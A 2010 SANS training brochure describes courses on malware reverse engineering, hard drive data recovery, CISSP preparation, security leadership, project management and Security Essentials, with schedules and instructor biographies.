*This course is available to Forensics 563 participants only.
Register at www.sans.org/network-security-2010
FORENSICS 610
Five-Day Program • Mon, Sept 20 - Fri, Sept 24, 2010 • 9:00am - 5:00pm
30 CPE Credits • Laptop Required • Instructor: Lenny Zeltser

Who Should Attend
• Anyone whose job requires an understanding of key aspects of malicious programs
• Individuals with responsibilities in incident handling, forensic analysis, Windows security, and system administration
• Individuals responsible for supporting their organization’s internal security needs
• Engineers from security product and service companies who are looking to deepen their malware analysis expertise

Expand your capacity to fight malicious code by learning how to analyze bots, worms, and trojans.
This popular five-day course discusses practical approaches to examining Windows malware using a variety of monitoring utilities, a disassembler, a debugger, and other tools useful for reverse-engineering malicious software. You don’t have to be a full-time malware searcher to benefit from this course—as organizations increasingly rely on their staff to act as first responders during a security incident, malware analysis skills become increasingly important.
By covering both behavioral and code analysis approaches, this unique course provides a rounded approach to reverse-engineering. As a result, the course makes malware analysis accessible even to individuals with a limited exposure to programming concepts. The materials do not assume that the students are familiar with reverse-engineering; however, the difficulty level of concepts and techniques increases quickly as the course progresses.
In the first half of the course, you will learn how to set up an inexpensive and flexible laboratory for understanding inner-workings of malware and demonstrate the process by exploring capabilities of real-world specimens. You will learn to examine the program’s behavioral patterns and assembly code and study techniques for bypassing common code obfuscation mechanisms. The course also explores how to analyze browser-based malware.
In the second half of the course, you will review key assembly language concepts. You will learn to examine malicious code to understand its flow by identifying key logic structures, looking at examples of bots, rootkits, key loggers, and so on. You will understand how to work with PE headers and handle DLL interactions. You will also develop skills for analyzing self-defending malware through advanced unpacking techniques and bypassing code-protection mechanisms. Finally, you will discover how to bypass obfuscation techniques employed by browser-based malicious scripts.
Hands-on workshop exercises are an essential aspect of this course and allow you to apply reverse-engineering techniques by examining malicious code in a carefully controlled environment. When performing the analysis, you will study the supplied specimen’s behavioral patterns, and examine key portions of its assembly code.

Prerequisites:
• Students should have a computer system that matches the stated laptop requirements. Some software needs to be installed before you come to class.
• Students should be familiar with using Windows and Linux operating environments and be able to troubleshoot general connectivity and setup issues.

REM course on YouTube
http://www.youtube.com/watch?v=5AFdZ0v23YA

GIAC Certification www.giac.org
610.1 Hands On: Malware Analysis Fundamentals*
Day one lays the groundwork for the course by presenting the key tools and techniques
malware analysts use to examine malicious programs. You will learn how to save time by
exploring malware in two phases. Behavioral analysis focuses on the specimen’s interactions
with its environment, such as the registry, the network, and the file system; code analysis
focuses on the specimen’s code and makes use of a disassembler and a debugger. You will
learn how to build a flexible laboratory to perform such analysis in a controlled manner
and will set up such a lab on your laptop. Also, we will jointly analyze a malware sample to
reinforce the concepts and tools discussed throughout the day.

610.2 Hands On: Additional Malware Analysis Approaches*


Day two builds upon the fundamentals introduced earlier in the course, and discusses
techniques for uncovering additional aspects of the malicious program’s functionality. You
will learn about packers and the analysis approaches that may help bypass their defenses.
You will also learn how to patch malicious executables to change their functionality during
the analysis without recompiling them. You will also understand how to redirect network
traffic in the lab to better interact with malware, such as bots and worms, to understand their
capabilities. You will also experiment with the essential tools and techniques for analyzing
Web-based malware, such as malicious browser scripts and Flash programs.
610.3 Hands On: Malicious Code Analysis*
Day three focuses on examining malicious executables at the assembly level. You will discover approaches for studying inner-workings of a specimen by looking at it through a disassembler and, at times, with the help of a debugger. The day begins with an overview of key code reversing concepts and presents a primer on essential x86 assembly concepts, such as instructions, function calls, variables, and jumps. You will also learn how to examine common assembly constructs, such as functions, loops, and conditional statements. The second half of the day discusses how malware implements common characteristics, such as keylogging, packet spoofing, and DLL injection, at the assembly level. You will learn how to recognize such characteristics in malware samples.

610.4 Hands On: Self-Defending Malware*
Day four begins by covering several techniques malware authors commonly employ to protect malicious software from being analyzed, often with the help of packers. You will learn how to bypass analysis defenses, such as structured error handling for execution flow, PE header corruption, fake memory breakpoints, tool detection, integrity checks, and timing controls. It’s a lot of fun! As with the other topics covered throughout the course, you will be able to experiment with such techniques during hands-on exercises. The course completes by revising the topic of Web-based malware, showing additional tools and approaches for analyzing more complex malicious scripts written in VBScript and JavaScript.

610.5 Hands On: Deeper Malware Analysis*
Day five represents the latest addition to the FOR610 course, discussing the more recent malware reverse-engineering approaches adopted by malware analysts. The topics covered during this day include analyzing malicious Microsoft Office and Adobe PDF document files. Exercises that demonstrate these techniques make use of tools, such as OfficeMalScanner, Offvis, PDF-parser, and PDF StructAzer. Another major topic covered during this day is the reversing of malicious Win32 executables using memory forensics techniques. This topic is explored with the help of tools, such as Volatility, malfind, moddump, and others, and brings us deeper into the world of user- and kernel-mode rootkits.

Senior Instructor: Lenny Zeltser
Lenny Zeltser leads the security consulting practice at Savvis. He is also a member of the board of directors at the SANS Technology Institute, a SANS faculty member, and an incident handler at the Internet Storm Center. Lenny frequently speaks on information security and related business topics at conferences and private events, writes articles, and has co-authored several books. Lenny is one of the few individuals in the world who has earned the highly-regarded GIAC Security Expert (GSE) designation. He also holds the CISSP certification. Lenny has an MBA degree from MIT Sloan and a computer science degree from the University of Pennsylvania. For more information about his projects, see www.zeltser.com.

Attention REM Course Alumni: Day five was very recently added to this course. If you’ve already attended the four-day version of the course (SEC610), you can take the whole five-day class now at a 50% discount or take just day five at one-fifth the full course price. This promotion is only valid in 2010. Please contact tuition@sans.org for details.
*This course is available to Forensics 610 participants only.
Register at www.sans.org/network-security-2010
HOSTED COURSE
Five-Day Program • Mon, Sept 20 - Fri, Sept 24, 2010
9:00am - 7:00pm (Days 1-4) • 9:00am - 3:30pm (Day 5)
39 CPE Credits • Laptop Required • Instructor: Scott Moulton

Who Should Attend
• Anyone who has ever tried to image a hard drive with bad blocks only to have it fail and never be able to get a good image of the drive
• Corporate personnel who handle large amounts of data and hard drives
• System administrators and incident handling personnel who want to understand how a hard drive actually works and are interested in reassembling one from the ground up
• Anyone who wants to learn how to do data recovery on a damaged hard drive and to collect best evidence
• Anyone who wants to learn how file systems are structured and how data is stored so that they can understand where evidence exists on any type of hard drive

The data recovery world and the forensics world are very close in relation.
This course discusses topics valuable to both forensic and data recovery professionals alike and touches on data recovery topics relating to forensics.
Our primary goal is clear: To produce valid disk images and recover the data from marginally operative or defective media for use in data recovery or forensics.
The processes and methodologies taught in this course will train you to collect an image on damaged evidence where standard forensic imaging would have failed. You will understand what kinds of problems hard drives have and what your options are to recover the contents. Specialized data recovery trade secrets used in these processes will be discussed so we can acquire data from damaged disks. We will perform some exciting labs in which you will format a hard drive, put data on the drive, disassemble the drive down to the bare metal, and then “successfully” reassemble the drive and recover your data from it.
This course will highlight the tools that work well with corrupted file systems, both in demonstration and in the lab exercises, and students will learn the basics of file systems and logical recoveries. There will be information regarding FAT, NTFS, Mac OSX HFS+ hard drive formats, EXT3, Reiser recoveries, and what to do when there is damage, with examples of each in labs. Students will also perform logical recoveries where we will use software and specialized data recovery equipment to image memory sticks, hard drives, and image files.
If you would like five bootcamp days of training and learning trade secrets of the data recovery profession, this is the course for you. It will consist of lecture and labs with mentoring on disassembly and reassembly of the hard drives. Usually by the second day, the majority of students are able to rebuild a hard drive and recover data from it. However, this course is about process and methodologies, teaching the techniques used in data recovery labs so that you can understand and build on those skills.

Evening Bootcamp Sessions
Evening hands-on session that allows students to utilize the knowledge gained throughout the course in an instructor-led environment.
5:00pm - 7:00pm (Days 1-4)

AUTHOR STATEMENT
The world of data recovery is cloaked in secrecy. Data recovery is a very difficult skill to learn and involves repairing damaged hard drives and recovering corrupt data. Many times it is difficult just to find out how a particular hard drive works. As a forensics or data recovery community, from time to time we all run into damaged hard drives that are difficult to create an image of. At one time or another, we have all been in that position where the software hangs and never completes – a difficult situation to be in when you have lawyers or clients looking over your shoulder. What do you do when you have that type of an error and your drive cannot be copied? The goal of this class is to teach you how to handle a damaged hard drive and what your options are. We will introduce you to the proper hardware, equipment, and software that will give you the best possibility and skills at completing this task. -Scott Moulton
Hands On – Part 1: Drive and Data Recovery Forensics*
On day one we introduce you to the basic hardware equipment used by data recovery professionals. We will break down the four main phases of data recovery, disassemble two hard drives, and then reassemble each piece and attempt to get the drive working again. We will close with a display of how to match hard drives for donor drives. We will start with the anatomy of the drive and begin to break down what each item is, what it is called, and its function. After discussing newer methods of recording to the hard drive, you will disassemble two hard drives during the lab and extract all the parts, and then reassemble each piece and attempt to get the drive working again. Over the next two days we will do a total of five drives in order to ensure your success.
Topics: Basic Hardware; Four Phases of Data Recovery; Anatomy of Hard Drives

Hands On – Part 2: Drive and Data Recovery Forensics*


We now move to the more logical functions controlled by the drive and the internals of initialization processes done by the drive at the power on cycle. We will cover the basic types of heads, how the content is read, and the way data is stored. For this to happen, we will need to learn about the contents of the System Area and its tables such as P-Lists, G-Lists, Zone Tables, and Password tables. Now that you know how the data arrives at the heads as it passes through the pre-amp, you will look at the content encoded in that sector and what each sector actually contains. We will finish day two by formatting the drives, copying files to the drive for recovery, and then breaking the drives down to bare metal before we reassemble and attempt to recover the data.
Topics: Hard Drive Heads Internals; Sector Examination; Reverse Imaging; Drive Rebuilding

Hands On – Part 3: Drive and Data Recovery Forensics*
We now have the skills to physically repair drives and get them working again and need to deal with the content, acquire the data, and repair any corruption that might have occurred. We begin the day looking at standard ways of imaging content. You’ll engage in several labs that demonstrate how you can see and recover data from corrupt drives, which includes reviewing partition structures, including the GUID Partition Structure, and recovering from NTFS when it won’t mount. The labs will include the use of Disk Explorer for NTFS and its special qualities that make it a superb data recovery tool when used in parallel with GetDataBack for NTFS. We will also review an NTFS drive using Testdisk.
Topics: Drive Acquisition; Corrupted NTFS Examination; Deepspar Disk Imager; Partition Structures

Hands On – Part 4: Drive and Data Recovery Forensics*
We will spend the first half of the day finishing up logical structures of the top three operating systems, followed by lecture and lab on assembling RAID 0 and RAID 5 arrays. First, we will finish up Windows and NTFS with the unusual differences between Vista and XP with regard to data recovery. During these sections, we will discuss the nature of each operating system, touching on its basic format and file structure. Labs will include HFSExplorer, where we can see the B* Tree structure stored in the Mac OSX Catalog. We will then move on to examining the basic functions and software available to recover Linux EXT 2/3 and Reiser. The labs for RAID 0 and RAID 5 will include several premade images, which we will process. You’ll see what happens when you have the settings for RAID wrong, quick and easy ways to identify the problems, how to find the correct settings by doing entropy by sight or sound, and correcting the issues so you can do a successful recovery.
Topics: RAID Acquisition; Reconstruction and Examination; MAC OSX Partition Corruption and Repair; Host Protected Areas

Hands On – Part 5: Drive and Data Recovery Forensics*
On day five we view information about Solid State Drives, what happens over time to data on solid state drives, and how the solid state drives function. We will cover the lower-level functions that are different than a physical hard drive and research capturing dd images of solid state drives at different times and what has happened to the data. You’ll learn about the future of storage and changes to hard drives, as well as flash media and introductory information about new technology called Domain Walls or RaceTrack Memory. We’ll wind down by covering a few of the unique functions of the drive that may affect your ability to get an image such as TPM, hard drive passwords, flash updates to the drive, translator tables, and secure erase wiping tools built into the motherboard and drive for high-speed wiping.
Topics: Solid State Drives; Flash Media Examination; Drive Encryption; Hard Drive Passwords; Drive Wiping

Hosted Instructor: Scott Moulton
Scott Moulton is president of Forensic Strategy Services, LLC and also owns a data recovery company called My Hard Drive Died.com. Scott has been doing computer forensics for almost nine years. He began his career with a specialty in rebuilding hard drives for investigative purposes. Since that time he has handled hard drives for many court cases that have involved depositions and testifying, including a murder investigation. Recently Scott worked on an FBI case where he had to completely reassemble a damaged hard drive, successfully recovering 97% of the data. Throughout his career, Scott has continued to develop new methods and teach them to the public, publish videos on how to recover hard drives and retrieve data long thought dead, and give presentations on his processes and methodologies all over the United States. His material has been used in courts around the world.

Register at www.sans.org/network-security-2010
MANAGEMENT 414
Six-Day Program • Mon, Sept 20 - Sat, Sept 25, 2010 • 9:00am - 5:00pm
Bootcamp Sessions: 5:00pm - 7:00pm (Days 1-5) • 8:00am - 9:00am (Days 2-6)
51 CPE Credits • Instructor: Eric Conrad

Who Should Attend
• Security professionals who are interested in understanding the concepts covered in the CISSP® exam as determined by (ISC)2
• Managers who want to understand the critical areas of network security
• System, security, and network administrators who want to understand the pragmatic applications of the CISSP® 10 Domains
• Security professionals and managers looking for practical ways the 10 domains of knowledge can be applied to the current job
• In short, if you desire a CISSP or your job requires it, MGT414 is the training for you

Over the past 4 years, 98% of all respondents who studied our SANS® +S™ Training Program for the CISSP® Certification Exam and then took the exam passed, compared to a national average of around 70% for other prep courses.
This is an accelerated review course that assumes the student has a basic understanding of networks and operating systems and focuses solely on the 10 domains of knowledge as determined by (ISC)2:
Domain 1 - Information Security Governance & Risk Management
Domain 2 - Access Controls
Domain 3 - Cryptography
Domain 4 - Physical (Environmental) Security
Domain 5 - Security Architecture & Design
Domain 6 - Business Continuity & Disaster Recovery Planning
Domain 7 - Telecommunications & Network Security
Domain 8 - Application Security
Domain 9 - Operations Security
Domain 10 - Legal, Regulations, Compliance & Investigations
Each domain of knowledge is dissected into its critical components. Every component is discussed in terms of its relationship to other components and other areas of network security. After completion of the course, the student will have a good working knowledge of the 10 domains of knowledge and, with proper preparation, be ready to take and pass the CISSP® exam.

Obtaining your CISSP® certification consists of:
• Fulfilling minimum requirements for professional work experience
• Completing the Candidate Agreement
• Periodic audit based on submission of resume
• Passing the CISSP® 250 multiple-choice question exam with a scaled score of 700 points or greater
• Submitting a properly completed and executed Endorsement Form

Note: The official (ISC)2 courseware and the CISSP® exam are NOT provided as part of the training.

BOOTCAMP
This session has extended hours.
Evening Bootcamp Sessions: 5:00pm - 7:00pm days 1 - 5.
Morning Bootcamp Sessions: 8:00am - 9:00am days 2 - 6.

AUTHOR STATEMENT
The CISSP® certification has been around for almost 10 years and covers security from a 30,000 foot view. CISSP® covers a lot of theoretical information that is critical for a security professional to understand. However, this material can be dry, and since most students do not see the direct applicability to their jobs, they find it boring. The goal of this course is to bring the CISSP® 10 domains of knowledge to life. By explaining important topics with stories, examples, and case studies, the practical workings of this information can be discovered. I challenge you to attend the SANS CISSP® training course and find the exciting aspects of the 10 domains of knowledge. -Eric Cole, PhD

GIAC Certification www.giac.org • DoD 8570 Required www.sans.org/8570 • STI Masters Program www.sans.edu
SANS® +S™ Training Program for the CISSP® Certification Exam is an accelerated SANS
CISSP® review course that covers the security concepts required for the CISSP® exam and will get you up
to speed fast! This course is for students who have a basic understanding of networks and operating
systems and focuses solely on the 10 domains of knowledge as determined by (ISC)2.

414.1 Introduction and Information Security Governance & Risk Management*
Learn the specific requirements needed to obtain various certifications as well as a CISSP®
certification. General security principles needed in order to understand the 10 domains of
knowledge are covered in detail with specific examples in each area. The first of 10 domains,
Information Security Governance & Risk Management, is discussed using real-world scenarios
to illustrate the critical points. Key concepts, including data classification, policies, and risk
management, are covered in detail.
Topics: Overview of Certification; Description of the 10 Domains: Introductory Material; Domain 1: Information
Security Governance & Risk Management

414.2 Access Controls and Cryptography*
Access controls covering AAA (authentication, authorization, and accountability) will be covered with an emphasis on controlling access to critical systems. Cryptography plays a critical role in the protection of information. Examples showing the correct and incorrect ways to deploy cryptography and common mistakes made will be presented. The three types of crypto systems are examined to show how they work together to accomplish the goals of crypto.
Topics: Domain 2: Access Controls; Domain 3: Cryptography

414.3 Physical (Environmental) Security and Security Architecture and Design*
If you do not have proper physical security, it doesn’t matter how good your network security is; someone can still obtain access to sensitive information. In this section various aspects and controls of physical security are discussed. A computer consists of both hardware and software. Understanding the components of the hardware, how they interoperate with each other and the software, is critical in order to implement proper security measures. We examine the different hardware components and how they interact to make a functioning computer.
Topics: Domain 4: Physical (Environmental) Security; Domain 5: Security Architecture and Design

414.4 Business Continuity & Disaster Recovery Planning and Telecommunications & Network Security*
Business continuity planning is examined, comparing the differences between BCP and DRP. A life cycle model for BCP/DRP is covered giving scenarios of how each step should be developed. Understanding network communications is critical to building a solid foundation for network security. All aspects of network security will be examined to include routing, switches, key protocols, and how they can be properly protected on the network.
Topics: Domain 6: Business Continuity & Disaster Recovery Planning; Domain 7: Telecommunications & Network Security

414.5 Applications Security and Operations Security*
In order to secure an application, it is important to understand system engineering principles and techniques. Software development life cycles are examined, including examples of what types of projects are suited for different life cycles. Non-technical aspects of security are just as critical as technical aspects. Operations security focuses on the legal and managerial aspects of security and covers components such as background checks and non-disclosure agreements, which can eliminate problems from occurring down the road.
Topics: Domain 8: Applications Security; Domain 9: Operations Security

414.6 Legal, Regulations, Compliance & Investigations, and Conclusions*
If you work in network security, understanding the law is critical during incident responses and investigations. The common types of laws are examined, showing how critical ethics are during any type of investigation. The course finishes with showing how you put all of the 10 domains into practice to attain a secure enterprise.
Topics: Domain 10: Legal, Regulations, Compliance & Investigations
*This course is available to Management 414 participants only.

Certified Instructor: Eric Conrad
Eric Conrad’s career began in 1991 as a Unix sysadmin for a small oceanographic communications company. He gained experience in a variety of industries, including research, education, power, Internet, and healthcare, and has worked with companies such as Mitsubishi Electric Research Labs, Boston University, The Open Group, Navipath, and Caritas Christi Health Care. He is now an independent information security consultant focusing on intrusion detection, incident handling, and penetration testing. In addition to the CISSP, he holds the prestigious GIAC Security Expert (GSE) certification as well as the GIAC GPEN, GCIH, GCIA, GCFA, GAWN, and GSEC certifications. He is a contributing author to SANS HIPAA Security Implementation. Eric also blogs about information security at www.ericconrad.com.

Register at www.sans.org/network-security-2010
MANAGEMENT 512
Security Leadership Essentials for Managers with Knowledge Compression™

Five-Day Program • Mon, Sept 20 - Fri, Sept 24, 2010 • 9:00am - 6:00pm (Days 1-4) • 9:00am - 4:00pm (Day 5)
33 CPE Credits • Instructor: Stephen Northcutt

Who Should Attend
• This course is designed and taught for mid-level to C-level managers and leaders. It will give you the ability to better manage IT projects in a secure manner.
• Anyone with 8570 information assurance management responsibilities
• Senior executives
• Vice presidents
• Security or assurance officers and managers
• Upwardly mobile managers

This completely updated course is designed to empower advancing managers who want to get up to speed fast on information security issues and terminology. You don’t just learn about security; you learn how to manage security.

Lecture sections are intense; the most common student comment is that it’s like drinking from a fire hose. The diligent manager will learn vital, up-to-date knowledge and skills required to supervise the security component of any information technology project. Additionally, the course has been engineered to incorporate the guidance of the NIST Special Publication 800 series so that it can be particularly useful to US government managers and supporting contractors.

Essential topics covered in this management course include network fundamentals and applications; power, cooling, and safety; architectural approaches to defense in depth; cyber attacks; vulnerability assessment and management; security policies; contingency and continuity planning; awareness management; risk management analysis; incident handling; Web application security; and offensive and defensive information warfare, culminating with our management practicum.

The material uses Knowledge Compression™, special charts, and other proprietary SANS techniques to help convey the key points of critical slides and keep the information flow rate at a pace senior executives demand every teaching hour of the course. Only SANS top instructors with management experience are invited to teach this course, and you will be able to put what you learn into practice the day you get back into the office.

Knowledge Compression™ uses specialized material, in-class reviews, examinations, and test-taking training to ensure that students have a solid understanding of the material that has been presented to them.

Please note that some course material for SEC401 and MGT512 may overlap. We recommend SEC401 for those interested in a more technical course of study and MGT512 for those primarily interested in a leadership-oriented but less technical learning experience.

AUTHOR STATEMENT
When SANS designed the Security Leadership Essentials for Managers with Knowledge Compression™ course, we chose to emulate the format utilized by many executive MBA programs. While core source material is derived from our highly regarded SANS Security Essentials program, we decided to focus this program on the big picture of securing the enterprise: network fundamentals, security technologies, using cryptography, defense in depth, policy development, and management practicum. Ultimately, the goal of this program is to ensure that managers charged with the responsibility for information security can make informed choices and decisions that will improve their organization’s security.
- Stephen Northcutt

GIAC Certification (www.giac.org) • DoD 8570 Required (www.sans.org/8570) • STI Masters Program (www.sans.edu)

Security Leaders and Managers earn the highest salaries (well over six figures) in information security and are near the top of IT. Needless to say, to work at that compensation level, excellence is demanded. These days, security managers are expected to have domain expertise as well as the classic project management, risk assessment, and policy review and development skills.

512.1 Managing the Plant, Network, and Information Architecture*
The course starts with a whirlwind tour of the information an effective IT security manager must know to function in today’s environment. We will cover safety, physical security, and how networks and the related protocols, like TCP/IP, work and equip you to review network designs for performance, security, vulnerability scanning, and return on investment. You will learn more about secure IT operations in a single day than you ever thought possible.
Topics: Budget Awareness and Project Management; The Network Infrastructure; Computer and Network Addressing; IP Terminology and Concepts; Vulnerability Management; Managing Physical Safety, Security & the Procurement Process

512.2 Defense In Depth*
Learn information assurance foundations, which are presented in the context of both current and historical computer security threats, and how they have impacted confidentiality, integrity, and availability. You will learn the methods of attack and the importance of managing attack surface.
Topics: Attacks Against the Enterprise; Defense in Depth; Managing Security Policy; Access Control and Password Management

512.3 Secure Communications*
Examine various cryptographic tools and technologies and how they can be used to secure a company’s assets. A related area called steganography, or information hiding, is also covered. Learn how malware and viruses often employ cryptographic techniques in an attempt to evade detection. We will learn about managing privacy issues in communications and investigate Web application security.
Topics: Cryptography; Wireless Network Security; Steganography; Managing Privacy; Web Communications and Security; Operations Security, Defensive and Offensive Methods

512.4 The Value of Information*
On this day, we consider the most valuable resource an organization has – its information. You will learn about intellectual property, incident handling, and how to identify and better protect the information that is the real value of your organization. We will then formally consider how to apply everything we have learned as well as practice briefing management on our risk architecture.
Topics: Managing Intellectual Property; Incident Handling Foundations; Information Warfare; Disaster Recovery/Contingency Planning; Managing Ethics; IT Risk Management

512.5 Management Practicum*
In the fifth and final day, we pull it all together and apply the technical knowledge to the art of management. The management practicum covers a number of specific applications and topics concerning information security. We’ll explore proven techniques for successful and effective management, empowering you to immediately apply what you have learned your first day back at the office.
Topics: The Mission; Globalization; IT Business and Program Growth; Security and Organizational Structure; The Total Cost of Ownership; Negotiations; Fraud; Legal Liability; Technical People

*This course is available to Management 512 participants only.

Register at www.sans.org/network-security-2010

SANS Faculty Fellow Stephen Northcutt
Stephen Northcutt founded the GIAC certification and currently serves as president of the SANS Technology Institute, a post-graduate level IT security college (www.sans.edu). Stephen, a graduate of Mary Washington College, is author/coauthor of four books, including Inside Network Perimeter Security 2nd Edition and IT Ethics Handbook. Since 2007 Stephen has conducted over 34 in-depth interviews with leaders in the security industry to research the competencies required to be a successful leader. He maintains the SANS Leadership Laboratory, where research on these competencies is posted, and is lead author for Execubytes, a monthly newsletter for security managers. Stephen is the lead author/instructor for MGT421: SANS Leadership and Management Competencies, as well as MGT512: SANS Security Leadership Essentials for Managers, a prep course for the GSLC certification that meets all levels of requirements for DoD Security Managers per DoD 8570. Stephen also blogs at https://blogs.sans.org/security-leadership.
MANAGEMENT 525
Project Management and Effective Communications for Security Professionals and Managers

Six-Day Program • Mon, Sept 20 - Sat, Sept 25, 2010 • 9:00am - 5:00pm
36 CPE Credits • Instructor: Jeff Frisk

Who Should Attend
• Security professionals who are interested in understanding the concepts of project management
• Managers who want to understand the critical areas of making projects successful
• Individuals working with time, cost, quality, and risk sensitive projects and applications
• Security professionals and managers who would like to utilize effective communication techniques and proven methods to relate better to people
• Individuals interested in preparing for the Project Management Institute’s Project Management Professional (PMP®) Exam

Designed to give you the knowledge and tools you need to become a top-notch project manager, this course focuses on effective communication, human resources, and quality management.

Throughout the week, we will cover all aspects of project management from initiating and planning projects through managing cost, time, and quality while your project is active to completing, closing, and documenting as your project finishes. This course follows the basic project management structure from the Project Management Institute’s Guide to the Project Management Body of Knowledge (PMBOK® Guide) and also offers specific insight and techniques to help you get the job done. You will leave this course with specific tools that can be utilized immediately in your work environment. A copy of the Guide (Fourth Edition) is provided to all participants. You can reference the PMBOK® Guide and use your course material along with the knowledge you gain in class to solidify your preparation for the updated Project Management Professional (PMP®) Exam and the GIAC Certified Project Manager Exam.

The project management process is broken down into core process groups that can be applied across multiple areas of any project. This course covers cost, time, quality, and risk management, but not only from the point of view of projects that create final products. Keeping in line with prevalent needs from the InfoSec industry, we look at projects that create and maintain services and cover in depth how cost, time, quality, and risk affect IT security and the services we provide to others both inside and outside of our organizational boundaries. We go into great detail covering human resource management as well as effective communication and conflict resolution. People are the most valuable resource we have on a project, and the communication and conflict resolution techniques presented can be used in all areas of professional work. Above all, projects fail or succeed because of the people involved. You want to make sure the people involved with the development and execution of your project build a strong team and communicate effectively.

PMBOK® and PMP® are registered trademarks of the Project Management Institute.

AUTHOR STATEMENT
Managing projects to completion, with an alert eye on quality, cost, and time, is something most of us need to do on an ongoing basis. In this course, we break down project management into its fundamental components and work to galvanize your understanding of the key concepts with an emphasis on practical application and execution. Since project managers spend the vast majority of their time communicating with others, we focus on traits and techniques that enable effective communication. As people are the most critical asset in the project management process, effective and thorough communication is essential.
-Jeff Frisk

“This course will provide a wealth of information to advance my career in the IT field.”
-DOREEN LAWRENCE, LOS ALAMOS NATIONAL LAB
GIAC Certification (www.giac.org) • STI Masters Program (www.sans.edu)

Project Management and Effective Communications for Security Professionals and Managers will help you hone your communication skills and enable you to succeed in managing projects where quality, cost, and time are driving factors.

525.1 Project Management Structure & Framework*
This course offers insight and specific techniques that both beginner and experienced project managers can utilize. The structure and framework section lays out the basic architecture and organization of project management. We will cover the common project management group processes, the difference between projects and operations, project life cycles, and managing project stakeholders.
Topics: Definition of Terms and Process Concepts; Group Processes; Project Life Cycle; Types of Organizations; PDCA Cycle

525.2 Project Charter and Scope Management*
During day two, we will go over techniques used to develop the project charter and formally initiate a project. The scope portion defines the important input parameters of project management and gives you the tools to ensure that from the onset your project is well defined. We cover tools and techniques that will help you define your project’s deliverables and develop milestones to gauge performance and manage change requests.
Topics: Formally Initiating Projects; Project Charters; Project Scope Development; Work Breakdown Structures; Scope Verification and Control

525.3 Time and Cost Management*
Our third day details the time and cost aspects of managing a project. We will cover the importance of correctly defining project activities, project activity sequence, and resource constraints. We will use milestones to set project timelines and task dependencies along with learning methods of resource allocation and scheduling. We introduce the difference between resource and product related costs and go into detail on estimating, budgeting, and controlling costs. You will learn techniques for estimating project cost and rates as well as budgeting and the process for developing a project cost baseline.
Topics: Process Flow; Task Lead and Lag Dependencies; Resource Breakdown Structures; Task Duration Estimating; Critical Path Scheduling; Cost Estimating Tools; Cost vs. Quality; Cost Base Lining; Earned Value Analysis and Forecasting

525.4 Communications and Human Resources*
During day four, we cover methods for identifying, acquiring, developing, and managing your project team. Performance appraisal tools are offered as well as conflict management techniques. You will learn management methods to help keep people motivated and provide great leadership. The effective communication portion of the day covers identifying and developing key interpersonal skills. We cover organizational communication and the different levels of communication as well as common communication barriers and tools to overcome these barriers.
Topics: Acquiring and Developing Your Project Team; Organizational Dependencies and Charts; Roles and Responsibilities; Team Building; Conflict Management; Interpersonal Communication Skills; Communication Models and Effective Listening

525.5 Quality and Risk Management*
On day five, you will become familiar with quality planning, quality assurance, and quality control methodologies as well as learning the cost of quality concept and its parameters. We define quality metrics and cover tools for establishing and benchmarking quality control programs. We go into quality assurance and auditing as well as using and understanding quality control charts. The risk section goes over known versus unknown risks and how to identify, assess, and categorize risk. We use quantitative risk analysis and modeling techniques so that you can fully understand how specific risks affect your project. You will learn ways to plan for and mitigate risk by reducing your exposure as well as how to take advantage of risks that could have a positive effect on your project.
Topics: Cost of Quality; Quality Metrics; Continual Process Improvement; Quality Baselines; Quality Control; Change Control; Risk Identification; Risk Assessment; Time and Cost Risks; Risk Probability and Impact Matrices; Risk Modeling and Response

525.6 Procurement and Project Integration*
We close out the week with the procurement aspects of project management and then integrate all of the concepts presented into a solid, broad-reaching approach. We cover contract basics and many different types of contracts and then the make versus buy decision process. We go over ways to initiate strong requests for quotation (RFQ) and develop evaluation criteria, then qualify and select the best partners for your project. The final session integrates everything we have learned by bringing all the topics together with the common process groups. Using detailed project management methodology, we learn how to finalize the project management plan and then execute and monitor the progress of your project to ensure success.
Topics: Contract Types; Make vs. Buy Analysis; Vendor Weighting Systems; Contract Negotiations; Project Execution; Monitoring Your Project’s Progress; Finalizing Deliverables; Forecasting and Integrated Change Control

*This course is available to Management 525 participants only.

Register at www.sans.org/network-security-2010

Certified Instructor Jeff Frisk
Jeff holds the PMP and GSEC credentials and currently serves as the director of the GIAC program. He has worked on many projects for SANS and GIAC, including courseware, certification, and exam development. Jeff has an engineering degree from The Rochester Institute of Technology and more than 15 years of IT project management experience with computer systems, high-tech consumer products, and business development initiatives. Jeff has held various positions, including managing operations, product development, and electronic systems/computer engineering. He has many years of international and high-tech business experience working with both big and small companies to develop computer hardware and software products and services.
SECURITY 401
SANS Security Essentials Bootcamp Style

Six-Day Program • Mon, Sept 20 - Sat, Sept 25, 2010 • 9:00am - 5:00pm
46 CPE Credits • Evening Bootcamp Sessions: 5:15pm - 7:00pm • Laptop Required • Instructor: Eric Cole, PhD

Who Should Attend
• Security professionals who want to fill the gaps in their understanding of technical information security
• Managers who want to understand information security beyond simple terminology and concepts
• Anyone new to information security with some background in information systems and networking

Maximize your training time and turbo-charge your career in security by learning the full SANS Security Essentials curriculum needed to qualify for the GSEC certification.

SANS Security Essentials is designed to give anyone interested in network security the skills required to be an effective player in this arena. This in-depth, comprehensive course provides the essential, up-to-the-minute knowledge and skills required for securing systems and organizations, and equips you with the language and theory of computer security. Learn all of this and more from the best security instructors in the industry.

BOOTCAMP (Security 401 participants only) • 5:15pm - 7:00pm • Required • Course Days 1-5
Attendance is required for the evening bootcamp sessions as the information presented appears on the GIAC exams. These daily bootcamps give you the opportunity to apply the knowledge gained throughout the course in an instructor-led environment. It helps fill your toolbox with valuable tools you can use to solve problems when you go back to work. The material covered is based on Dr. Eric Cole’s “cookbook for geeks,” and most students find it to be one of the highlights of their Security Essentials experience! Students will have the opportunity to install, configure, and use the tools and techniques they have learned. CDs containing the software required will be provided for each student. Students should arrive with a laptop properly configured. A working knowledge of each operating system is recommended but not required. For students who do not wish to build a dual boot machine, SANS will provide a bootable Linux CD for the Linux exercises.

This course is endorsed by the Committee on National Security Systems (CNSS) NSTISSI 4013 Standard for Systems Administrators in Information Systems Security (INFOSEC).

Please note that some course material for SEC401 and MGT512 may overlap. We recommend SEC401 for those interested in a more technical course of study and MGT512 for those primarily interested in a leadership-oriented but less technical learning experience.

AUTHOR STATEMENT
One of the things I love to hear from students after teaching Security 401 is, “I have worked in security for many years, and after taking this course I realized how much I did not know.” With the latest version of SANS Security Essentials Bootcamp Style, we have really captured the critical aspects of security and enhanced those topics with examples to drive home the key points. After attending this course, I am confident you will walk away with solutions to problems you have had for a while plus solutions to problems you did not even know you had.
-Eric Cole, PhD
